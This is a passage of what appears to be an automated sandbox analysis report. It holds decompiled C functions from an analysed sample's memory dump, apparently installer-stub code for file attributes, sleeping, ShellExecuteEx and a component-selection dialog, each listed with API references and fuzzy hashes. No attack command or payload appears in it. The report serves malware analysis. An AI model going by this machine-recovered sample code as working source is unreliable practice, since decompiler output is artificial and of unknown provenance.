                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                      • Instruction Fuzzy Hash: B7D0EC32000209BADF115F90ED05FAB371DEB08350F004C26BE45A4091D6759530AA58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040159D() {
                                                      				int _t5;
                                                      				void* _t11;
                                                      				int _t14;
                                                      
                                                      				_t5 = SetFileAttributesA(E00402ACB(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                      				_t14 = _t5;
                                                      				if(_t14 == 0) {
                                                      					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                      				}
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t11 - 4));
                                                      				return 0;
                                                      			}







                                                      APIs
                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 0cab36499558db6e8e20a76730a0526e1850ad136f29eccd2b2fbe03c7a71729
                                                      • Instruction ID: 6c3c7c81edca22ef1082c61e7c8c2dbb2dad1037c78d96895750c72c7df92d73
                                                      • Opcode Fuzzy Hash: 0cab36499558db6e8e20a76730a0526e1850ad136f29eccd2b2fbe03c7a71729
                                                      • Instruction Fuzzy Hash: 81D01272704111DBCB01EBE89B489DDB7A49B40328B308537D111F21D1D6B98A45A72D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ShowWindow.USER32(0001040E), ref: 00401596
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: a7e7ca525386e16ee7e89cfb1fc4c75f42d594badfd29f8b07d6e0c03fd97da5
                                                      • Instruction ID: a21bfe6b1d13300a8ee4ecaf898b43311dd8cfbd3fc211a1c449442b6368b73e
                                                      • Opcode Fuzzy Hash: a7e7ca525386e16ee7e89cfb1fc4c75f42d594badfd29f8b07d6e0c03fd97da5
                                                      • Instruction Fuzzy Hash: 81D0A97A304122EBCA01F3E8A90889EE7A08B913183304033E202B50E1D0BC4603BBEF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404068(int _a4) {
                                                      				struct HWND__* _t2;
                                                      				long _t3;
                                                      
                                                      				_t2 =  *0x7a2718; // 0x10408
                                                      				if(_t2 != 0) {
                                                      					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                      					return _t3;
                                                      				}
                                                      				return _t2;
                                                      			}






                                                      APIs
                                                      • SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 0040407A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                      • Instruction ID: 451079f561cf800dc5e0e3c220f6615dfdf47e2dc175ffa0b928ab0310d81608
                                                      • Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                      • Instruction Fuzzy Hash: E0C09B717407007BFA20CB649E49F077798AB90710F15842DB790F50E1C674E410DA1C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404051(int _a4) {
                                                      				long _t2;
                                                      
                                                      				_t2 = SendMessageA( *0x7a2f48, 0x28, _a4, 1); // executed
                                                      				return _t2;
                                                      			}





                                                      APIs
                                                      • SendMessageA.USER32(00000028,?,00000001,00403E81), ref: 0040405F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                      • Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
                                                      • Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                      • Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040565F(struct _SHELLEXECUTEINFOA* _a4) {
                                                      				struct _SHELLEXECUTEINFOA* _t4;
                                                      				int _t5;
                                                      
                                                      				_t4 = _a4;
                                                      				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                      				_t4->cbSize = 0x3c; // executed
                                                      				_t5 = ShellExecuteExA(_t4); // executed
                                                      				return _t5;
                                                      			}






                                                      APIs
                                                      • ShellExecuteExA.SHELL32(?,00401EC2,?), ref: 0040566E
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID:
                                                      • API String ID: 587946157-0
                                                      • Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                      • Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
                                                      • Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                      • Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004031A1(long _a4) {
                                                      				long _t2;
                                                      
                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                      				return _t2;
                                                      			}





                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,0003FBE4), ref: 004031AF
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040403E(int _a4) {
                                                      				int _t2;
                                                      
                                                      				_t2 = EnableWindow( *0x79f53c, _a4); // executed
                                                      				return _t2;
                                                      			}





                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00403E1A), ref: 00404048
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 16589da7e4045b76edf9d30eb88c390adf98e68054f17749ecabb79a433e11f9
                                                      • Instruction ID: 19a36987b167f9348e871b3ba6280065f8d182bcd10231b416c22424f7deb768
                                                      • Opcode Fuzzy Hash: 16589da7e4045b76edf9d30eb88c390adf98e68054f17749ecabb79a433e11f9
                                                      • Instruction Fuzzy Hash: 0DA00176404101EBCB029F54FF08D4ABFA2AFA4705B12C43AE295D4036CA764872FF1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004014D6(intOrPtr __edx) {
                                                      				long _t3;
                                                      				void* _t7;
                                                      				intOrPtr _t10;
                                                      				void* _t13;
                                                      
                                                      				_t10 = __edx;
                                                      				_t3 = E00402AA9(_t7);
                                                      				 *((intOrPtr*)(_t13 - 0x3c)) = _t10;
                                                      				if(_t3 <= 1) {
                                                      					_t3 = 1;
                                                      				}
                                                      				Sleep(_t3); // executed
                                                      				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t13 - 4));
                                                      				return 0;
                                                      			}








                                                      APIs
                                                      • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: e73a92aa41515daeb585d050e8429cc66fc7923e91e6afc56cf09d11a5d12b2a
                                                      • Instruction ID: a830f3fcad8b1b5918cbc0f4af807c6c9b556cc747c31dbb8bc258613536cb5a
                                                      • Opcode Fuzzy Hash: e73a92aa41515daeb585d050e8429cc66fc7923e91e6afc56cf09d11a5d12b2a
                                                      • Instruction Fuzzy Hash: C8D05B73B10141DBD714E7F8BD8485E73B4DB503153204837D441E1091D578C5424A28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00404A21(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                      				struct HWND__* _v8;
                                                      				struct HWND__* _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				intOrPtr _v24;
                                                      				signed char* _v28;
                                                      				long _v32;
                                                      				signed int _v40;
                                                      				int _v44;
                                                      				signed int* _v56;
                                                      				signed char* _v60;
                                                      				signed int _v64;
                                                      				long _v68;
                                                      				void* _v72;
                                                      				intOrPtr _v76;
                                                      				intOrPtr _v80;
                                                      				void* _v84;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t179;
                                                      				intOrPtr _t180;
                                                      				int _t187;
                                                      				signed int _t192;
                                                      				intOrPtr _t195;
                                                      				intOrPtr _t197;
                                                      				long _t201;
                                                      				signed int _t205;
                                                      				signed int _t216;
                                                      				void* _t219;
                                                      				void* _t220;
                                                      				int _t226;
                                                      				intOrPtr _t230;
                                                      				signed int _t231;
                                                      				signed int _t232;
                                                      				signed int _t233;
                                                      				signed int* _t235;
                                                      				signed int _t239;
                                                      				signed int _t241;
                                                      				signed char _t242;
                                                      				signed int _t244;
                                                      				signed int _t247;
                                                      				signed char _t248;
                                                      				signed int _t249;
                                                      				void* _t252;
                                                      				void* _t254;
                                                      				signed char* _t270;
                                                      				signed char _t271;
                                                      				long _t276;
                                                      				int _t282;
                                                      				signed int _t283;
                                                      				long _t284;
                                                      				signed int _t287;
                                                      				int _t290;
                                                      				signed int _t294;
                                                      				intOrPtr _t301;
                                                      				signed char* _t302;
                                                      				struct HWND__* _t306;
                                                      				int _t307;
                                                      				signed int* _t308;
                                                      				int _t309;
                                                      				long _t310;
                                                      				signed int _t311;
                                                      				void* _t313;
                                                      				long _t314;
                                                      				int _t315;
                                                      				signed int _t316;
                                                      				void* _t318;
                                                      				void* _t326;
                                                      				void* _t329;
                                                      
                                                      				_t306 = _a4;
                                                      				_v12 = GetDlgItem(_t306, 0x3f9);
                                                      				_v8 = GetDlgItem(_t306, 0x408);
                                                      				_t179 =  *0x7a2f88; // 0xae4f8c
                                                      				_t318 = SendMessageA;
                                                      				_v20 = _t179;
                                                      				_t180 =  *0x7a2f54; // 0xae4de0
                                                      				_t282 = 0;
                                                      				_v24 = _t180 + 0x94;
                                                      				if(_a8 != 0x110) {
                                                      					L23:
                                                      					__eflags = _a8 - 0x405;
                                                      					if(_a8 != 0x405) {
                                                      						_t285 = _a16;
                                                      					} else {
                                                      						_a12 = _t282;
                                                      						_t285 = 1;
                                                      						_a8 = 0x40f;
                                                      						_a16 = 1;
                                                      					}
                                                      					__eflags = _a8 - 0x4e;
                                                      					if(_a8 == 0x4e) {
                                                      						L28:
                                                      						__eflags = _a8 - 0x413;
                                                      						_v16 = _t285;
                                                      						if(_a8 == 0x413) {
                                                      							L30:
                                                      							__eflags =  *0x7a2f5d & 0x00000002;
                                                      							if(( *0x7a2f5d & 0x00000002) != 0) {
                                                      								L41:
                                                      								__eflags = _v16 - _t282;
                                                      								if(_v16 != _t282) {
                                                      									_t231 = _v16;
                                                      									__eflags =  *((intOrPtr*)(_t231 + 8)) - 0xfffffe6e;
                                                      									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                                                      										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                      									}
                                                      									_t232 = _v16;
                                                      									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6a;
                                                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                                                      										__eflags =  *((intOrPtr*)(_t232 + 0xc)) - 2;
                                                      										_t285 = _v20;
                                                      										_t233 =  *(_t232 + 0x5c);
                                                      										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                      											_t235 = _t233 * 0x418 + _t285 + 8;
                                                      											 *_t235 =  *_t235 & 0xffffffdf;
                                                      											__eflags =  *_t235;
                                                      										} else {
                                                      											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L48;
                                                      							}
                                                      							__eflags = _a8 - 0x413;
                                                      							if(_a8 == 0x413) {
                                                      								L33:
                                                      								__eflags = _a8 - 0x413;
                                                      								_t285 = 0 | _a8 != 0x00000413;
                                                      								_t239 = E0040496F(_v8, _a8 != 0x413);
                                                      								_t311 = _t239;
                                                      								__eflags = _t311 - _t282;
                                                      								if(_t311 >= _t282) {
                                                      									_t88 = _v20 + 8; // 0x8
                                                      									_t285 = _t239 * 0x418 + _t88;
                                                      									_t241 =  *_t285;
                                                      									__eflags = _t241 & 0x00000010;
                                                      									if((_t241 & 0x00000010) == 0) {
                                                      										__eflags = _t241 & 0x00000040;
                                                      										if((_t241 & 0x00000040) == 0) {
                                                      											_t242 = _t241 ^ 0x00000001;
                                                      											__eflags = _t242;
                                                      										} else {
                                                      											_t248 = _t241 ^ 0x00000080;
                                                      											__eflags = _t248;
                                                      											if(_t248 >= 0) {
                                                      												_t242 = _t248 & 0x000000fe;
                                                      											} else {
                                                      												_t242 = _t248 | 0x00000001;
                                                      											}
                                                      										}
                                                      										 *_t285 = _t242;
                                                      										E0040117D(_t311);
                                                      										_t244 =  *0x7a2f5c; // 0x80
                                                      										_t247 =  !_t244 >> 0x00000008 & 0x00000001;
                                                      										__eflags = _t247;
                                                      										_a12 = _t311 + 1;
                                                      										_a16 = _t247;
                                                      										_a8 = 0x40f;
                                                      									}
                                                      								}
                                                      								goto L41;
                                                      							}
                                                      							_t285 = _a16;
                                                      							__eflags =  *((intOrPtr*)(_t285 + 8)) - 0xfffffffe;
                                                      							if( *((intOrPtr*)(_t285 + 8)) != 0xfffffffe) {
                                                      								goto L41;
                                                      							}
                                                      							goto L33;
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t285 + 4)) - 0x408;
                                                      						if( *((intOrPtr*)(_t285 + 4)) != 0x408) {
                                                      							goto L48;
                                                      						}
                                                      						goto L30;
                                                      					} else {
                                                      						__eflags = _a8 - 0x413;
                                                      						if(_a8 != 0x413) {
                                                      							L48:
                                                      							__eflags = _a8 - 0x111;
                                                      							if(_a8 != 0x111) {
                                                      								L56:
                                                      								__eflags = _a8 - 0x200;
                                                      								if(_a8 == 0x200) {
                                                      									SendMessageA(_v8, 0x200, _t282, _t282);
                                                      								}
                                                      								__eflags = _a8 - 0x40b;
                                                      								if(_a8 == 0x40b) {
                                                      									_t219 =  *0x79f524;
                                                      									__eflags = _t219 - _t282;
                                                      									if(_t219 != _t282) {
                                                      										ImageList_Destroy(_t219);
                                                      									}
                                                      									_t220 =  *0x79f538;
                                                      									__eflags = _t220 - _t282;
                                                      									if(_t220 != _t282) {
                                                      										GlobalFree(_t220);
                                                      									}
                                                      									 *0x79f524 = _t282;
                                                      									 *0x79f538 = _t282;
                                                      									 *0x7a2fc0 = _t282;
                                                      								}
                                                      								__eflags = _a8 - 0x40f;
                                                      								if(_a8 != 0x40f) {
                                                      									L88:
                                                      									__eflags = _a8 - 0x420;
                                                      									if(_a8 == 0x420) {
                                                      										__eflags =  *0x7a2f5d & 0x00000001;
                                                      										if(( *0x7a2f5d & 0x00000001) != 0) {
                                                      											__eflags = _a16 - 0x20;
                                                      											_t187 = (0 | _a16 == 0x00000020) << 3;
                                                      											__eflags = _t187;
                                                      											_t307 = _t187;
                                                      											ShowWindow(_v8, _t307);
                                                      											ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                      										}
                                                      									}
                                                      									goto L91;
                                                      								} else {
                                                      									E004011EF(_t285, _t282, _t282);
                                                      									_t192 = _a12;
                                                      									__eflags = _t192 - _t282;
                                                      									if(_t192 != _t282) {
                                                      										__eflags = _t192 - 0xffffffff;
                                                      										if(_t192 != 0xffffffff) {
                                                      											_t192 = _t192 - 1;
                                                      											__eflags = _t192;
                                                      										}
                                                      										_push(_t192);
                                                      										_push(8);
                                                      										E004049EF();
                                                      									}
                                                      									__eflags = _a16 - _t282;
                                                      									if(_a16 == _t282) {
                                                      										L75:
                                                      										E004011EF(_t285, _t282, _t282);
                                                      										__eflags =  *0x7a2f8c - _t282; // 0x6
                                                      										_v32 =  *0x79f538;
                                                      										_t195 =  *0x7a2f88; // 0xae4f8c
                                                      										_v60 = 0xf030;
                                                      										_v20 = _t282;
                                                      										if(__eflags <= 0) {
                                                      											L86:
                                                      											InvalidateRect(_v8, _t282, 1);
                                                      											_t197 =  *0x7a271c; // 0xaea04d
                                                      											__eflags =  *((intOrPtr*)(_t197 + 0x10)) - _t282;
                                                      											if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                      												E0040492A(0x3ff, 0xfffffffb, E00404942(5));
                                                      											}
                                                      											goto L88;
                                                      										} else {
                                                      											_t138 = _t195 + 8; // 0xae4f94
                                                      											_t308 = _t138;
                                                      											do {
                                                      												_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                      												__eflags = _t201 - _t282;
                                                      												if(_t201 != _t282) {
                                                      													_t287 =  *_t308;
                                                      													_v68 = _t201;
                                                      													__eflags = _t287 & 0x00000001;
                                                      													_v72 = 8;
                                                      													if((_t287 & 0x00000001) != 0) {
                                                      														_t147 =  &(_t308[4]); // 0xae4fa4
                                                      														_v72 = 9;
                                                      														_v56 = _t147;
                                                      														_t150 =  &(_t308[0]);
                                                      														 *_t150 = _t308[0] & 0x000000fe;
                                                      														__eflags =  *_t150;
                                                      													}
                                                      													__eflags = _t287 & 0x00000040;
                                                      													if((_t287 & 0x00000040) == 0) {
                                                      														_t205 = (_t287 & 0x00000001) + 1;
                                                      														__eflags = _t287 & 0x00000010;
                                                      														if((_t287 & 0x00000010) != 0) {
                                                      															_t205 = _t205 + 3;
                                                      															__eflags = _t205;
                                                      														}
                                                      													} else {
                                                      														_t205 = 3;
                                                      													}
                                                      													_t290 = (_t287 >> 0x00000005 & 0x00000001) + 1;
                                                      													__eflags = _t290;
                                                      													_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                      													SendMessageA(_v8, 0x1102, _t290, _v68);
                                                      													SendMessageA(_v8, 0x110d, _t282,  &_v72);
                                                      												}
                                                      												_v20 = _v20 + 1;
                                                      												_t308 =  &(_t308[0x106]);
                                                      												__eflags = _v20 -  *0x7a2f8c; // 0x6
                                                      											} while (__eflags < 0);
                                                      											goto L86;
                                                      										}
                                                      									} else {
                                                      										_t309 = E004012E2( *0x79f538);
                                                      										E00401299(_t309);
                                                      										_t216 = 0;
                                                      										_t285 = 0;
                                                      										__eflags = _t309 - _t282;
                                                      										if(_t309 <= _t282) {
                                                      											L74:
                                                      											SendMessageA(_v12, 0x14e, _t285, _t282);
                                                      											_a16 = _t309;
                                                      											_a8 = 0x420;
                                                      											goto L75;
                                                      										} else {
                                                      											goto L71;
                                                      										}
                                                      										do {
                                                      											L71:
                                                      											_t301 = _v24;
                                                      											__eflags =  *((intOrPtr*)(_t301 + _t216 * 4)) - _t282;
                                                      											if( *((intOrPtr*)(_t301 + _t216 * 4)) != _t282) {
                                                      												_t285 = _t285 + 1;
                                                      												__eflags = _t285;
                                                      											}
                                                      											_t216 = _t216 + 1;
                                                      											__eflags = _t216 - _t309;
                                                      										} while (_t216 < _t309);
                                                      										goto L74;
                                                      									}
                                                      								}
                                                      							}
                                                      							__eflags = _a12 - 0x3f9;
                                                      							if(_a12 != 0x3f9) {
                                                      								goto L91;
                                                      							}
                                                      							__eflags = _a12 >> 0x10 - 1;
                                                      							if(_a12 >> 0x10 != 1) {
                                                      								goto L91;
                                                      							}
                                                      							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                                                      							__eflags = _t226 - 0xffffffff;
                                                      							if(_t226 == 0xffffffff) {
                                                      								goto L91;
                                                      							}
                                                      							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                                                      							__eflags = _t310 - 0xffffffff;
                                                      							if(_t310 == 0xffffffff) {
                                                      								L54:
                                                      								_t310 = 0x20;
                                                      								L55:
                                                      								E00401299(_t310);
                                                      								SendMessageA(_a4, 0x420, _t282, _t310);
                                                      								_t119 =  &_a12;
                                                      								 *_t119 = _a12 | 0xffffffff;
                                                      								__eflags =  *_t119;
                                                      								_a16 = _t282;
                                                      								_a8 = 0x40f;
                                                      								goto L56;
                                                      							}
                                                      							_t230 = _v24;
                                                      							__eflags =  *((intOrPtr*)(_t230 + _t310 * 4)) - _t282;
                                                      							if( *((intOrPtr*)(_t230 + _t310 * 4)) != _t282) {
                                                      								goto L55;
                                                      							}
                                                      							goto L54;
                                                      						}
                                                      						goto L28;
                                                      					}
                                                      				} else {
                                                      					_t249 =  *0x7a2f8c; // 0x6
                                                      					_v32 = 0;
                                                      					_v16 = 2;
                                                      					 *0x7a2fc0 = _t306;
                                                      					 *0x79f538 = GlobalAlloc(0x40, _t249 << 2);
                                                      					_t252 = LoadBitmapA( *0x7a2f40, 0x6e);
                                                      					 *0x79f52c =  *0x79f52c | 0xffffffff;
                                                      					_t313 = _t252;
                                                      					 *0x79f534 = SetWindowLongA(_v8, 0xfffffffc, E00405018);
                                                      					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                      					 *0x79f524 = _t254;
                                                      					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                      					SendMessageA(_v8, 0x1109, 2,  *0x79f524);
                                                      					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                      						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                      					}
                                                      					DeleteObject(_t313);
                                                      					_t314 = 0;
                                                      					do {
                                                      						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                      						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                      							if(_t314 != 0x20) {
                                                      								_v16 = _t282;
                                                      							}
                                                      							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F9F(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                      						}
                                                      						_t314 = _t314 + 1;
                                                      					} while (_t314 < 0x21);
                                                      					_t315 = _a16;
                                                      					_t283 = _v16;
                                                      					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                      					_push(0x15);
                                                      					E0040401C(_a4);
                                                      					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                      					_push(0x16);
                                                      					E0040401C(_a4);
                                                      					_t316 = 0;
                                                      					_t284 = 0;
                                                      					_t326 =  *0x7a2f8c - _t316; // 0x6
                                                      					if(_t326 <= 0) {
                                                      						L19:
                                                      						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                      						goto L20;
                                                      					} else {
                                                      						_t302 = _v20 + 8;
                                                      						_v28 = _t302;
                                                      						do {
                                                      							_t270 =  &(_t302[0x10]);
                                                      							if( *_t270 != 0) {
                                                      								_v60 = _t270;
                                                      								_t271 =  *_t302;
                                                      								_t294 = 0x20;
                                                      								_v84 = _t284;
                                                      								_v80 = 0xffff0002;
                                                      								_v76 = 0xd;
                                                      								_v64 = _t294;
                                                      								_v40 = _t316;
                                                      								_v68 = _t271 & _t294;
                                                      								if((_t271 & 0x00000002) == 0) {
                                                      									__eflags = _t271 & 0x00000004;
                                                      									if((_t271 & 0x00000004) == 0) {
                                                      										 *( *0x79f538 + _t316 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                      									} else {
                                                      										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                                                      									}
                                                      								} else {
                                                      									_v76 = 0x4d;
                                                      									_v44 = 1;
                                                      									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                      									_v32 = 1;
                                                      									 *( *0x79f538 + _t316 * 4) = _t276;
                                                      									_t284 =  *( *0x79f538 + _t316 * 4);
                                                      								}
                                                      							}
                                                      							_t316 = _t316 + 1;
                                                      							_t302 =  &(_v28[0x418]);
                                                      							_t329 = _t316 -  *0x7a2f8c; // 0x6
                                                      							_v28 = _t302;
                                                      						} while (_t329 < 0);
                                                      						if(_v32 != 0) {
                                                      							L20:
                                                      							if(_v16 != 0) {
                                                      								E00404051(_v8);
                                                      								_t282 = 0;
                                                      								__eflags = 0;
                                                      								goto L23;
                                                      							} else {
                                                      								ShowWindow(_v12, 5);
                                                      								E00404051(_v12);
                                                      								L91:
                                                      								return E00404083(_a8, _a12, _a16);
                                                      							}
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A39
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404A44
                                                      • GlobalAlloc.KERNEL32(00000040,00000006), ref: 00404A8E
                                                      • LoadBitmapA.USER32(0000006E), ref: 00404AA1
                                                      • SetWindowLongA.USER32(?,000000FC,00405018), ref: 00404ABA
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ACE
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AE0
                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404AF6
                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B02
                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B14
                                                      • DeleteObject.GDI32(00000000), ref: 00404B17
                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B42
                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B4E
                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BE3
                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C0E
                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C22
                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404C51
                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C5F
                                                      • ShowWindow.USER32(?,00000005), ref: 00404C70
                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D6D
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DD2
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DE7
                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E0B
                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E2B
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404E40
                                                      • GlobalFree.KERNEL32(?), ref: 00404E50
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EC9
                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404F72
                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F81
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FA1
                                                      • ShowWindow.USER32(?,00000000), ref: 00404FEF
